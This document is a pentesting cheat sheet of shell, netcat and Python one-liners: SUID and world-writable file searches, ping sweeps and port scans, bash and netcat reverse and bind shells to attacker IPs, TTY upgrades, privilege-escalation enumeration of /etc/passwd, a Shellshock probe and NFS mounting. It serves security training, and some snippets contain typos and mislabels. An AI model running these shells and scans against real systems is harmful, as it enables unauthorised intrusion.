Table of Contents
shell / bash reference
tee
– send stdin to output file -a
to append
File search
find / -iname sdb* -exec {} \;
– find files and execute command on the results
cut -d”/“ -f3
– cut on the delimiter “/“ and the 3rd field
find / -perm -4000 -print
– Find all SUID files
find / -perm -4000 -exec ls -l {} \;
find / -perm -2000 -print
– Find all SGID files
find / -perm -2 ! -type l -ls 2>/dev/null
– find world writeable files
Scripting
$1
first argument of script
for script
for name in $(cat filesname.txt); do
some commands with $name variable
done
IFS
– Line seperator
export IFS=$'\n'
– loop onm line
Ping Sweep – for i in $(seq 1 254); do ping -c 1 10.11.1.$i; done
Port Scan – for i in $(cat portlist.txt); do nc -nv -w1 -z 10.11.1.8 $i; done
if
if [-z “$1”]; then #if exists value in variable $1
some commands
fi
redirect StdErr to StdOut
2>&1
command 2> /dev/null
– Ignore stderr
Rsverse Shells
revserse shell (bash – linux)
bash -i >& /dev/tcp/192.168.30.5/443 0>&1
bash -c 'echo 1> /dev/tcp/x.x.x.x/x && echo open || echo false'
– check to see a port is open
Netcat
- client mode –
nc -nv 127.0.0.1 25
- Server mode –
nc -nlvp 4444
- Server run command when connecting to port (bind shell) –
nc -lvp 4444 -e cmd.exe
- port scan –
nc -nvv -w -l -z $ipaddress $startport-$endport
- UDP –
-u
argument
reverse shell
- setup netcat server (listener)
nc -nv 127.0.0.1 25 -e /bin/sh
– connect client to server
ncat
- encrypted netcat rewrite
- bind shell –
ncat -lvp 4444 -e cmd.exe —allow 192.168.4.4 —ssl
- client –
ncat -v 192.168.3.2 4444 —ssl
Fixing the Shell
- use python pty
- Set TERM=xterm-color
- background reverse shell run
stty raw -echo
fix shell script – linux
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-color
stty rows 50 cols 132
tcpdump
-A
– Print each packet (minus its link level header) in ASCII. Handy for capturing web pages.
Python Reference
Python TTY – python -c 'import pty;pty.spawn("/bin/bash")'
Python Web server – python -m SimpleHTTPServer 8000
HEX conversion
import struct
hex(strict.unpack("I", "VALUE")[0]) # native order
hex(strict.unpack(">I", "VALUE")[0]) # big endian
hex(strict.unpack("<I", "VALUE")[0]) # big endian
struct.pack("I", 0x2323323) # convert to binary string
python ftp server
# Install pyftpdlib
pip install pyftpdlib
# Run (-w flag allows anonymous write access)
python -m pyftpdlib -p 21 -w
Enumeration
Basic Linux Privilege Escalation
Penetration Testing Methodology – 0DAYsecurity.com
-
What’s the OS? What version? What architecture?
cat /etc/*-release
uname -i
lsb_release -a
(Debian based OSs) -
Who are we? Where are we?
id
pwd
-
Who uses the box? What users? (And which ones have a valid shell)
cat /etc/passwd
grep -vE "nologin|false" /etc/passwd
-
What’s currently running on the box? What active network services are there?
ps aux
netstat -antup
-
What’s installed? What kernel is being used?
dpkg -l
(Debian based OSs)
rpm -qa
(CentOS / openSUSE )
uname -a
Exploits
Shell Shock
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
mysql
NFS
showmount -e IP
– list exports
showmount -a IP
– list all mount points
mount -f nfs -o vers=3 IP:SHARE DIR
– mount NFS share
- you can set a local user to match user/group
- export settings
- "root_squash" – map root user to nobody
- "no_all_squash" – blocks mapping of other UID to nobody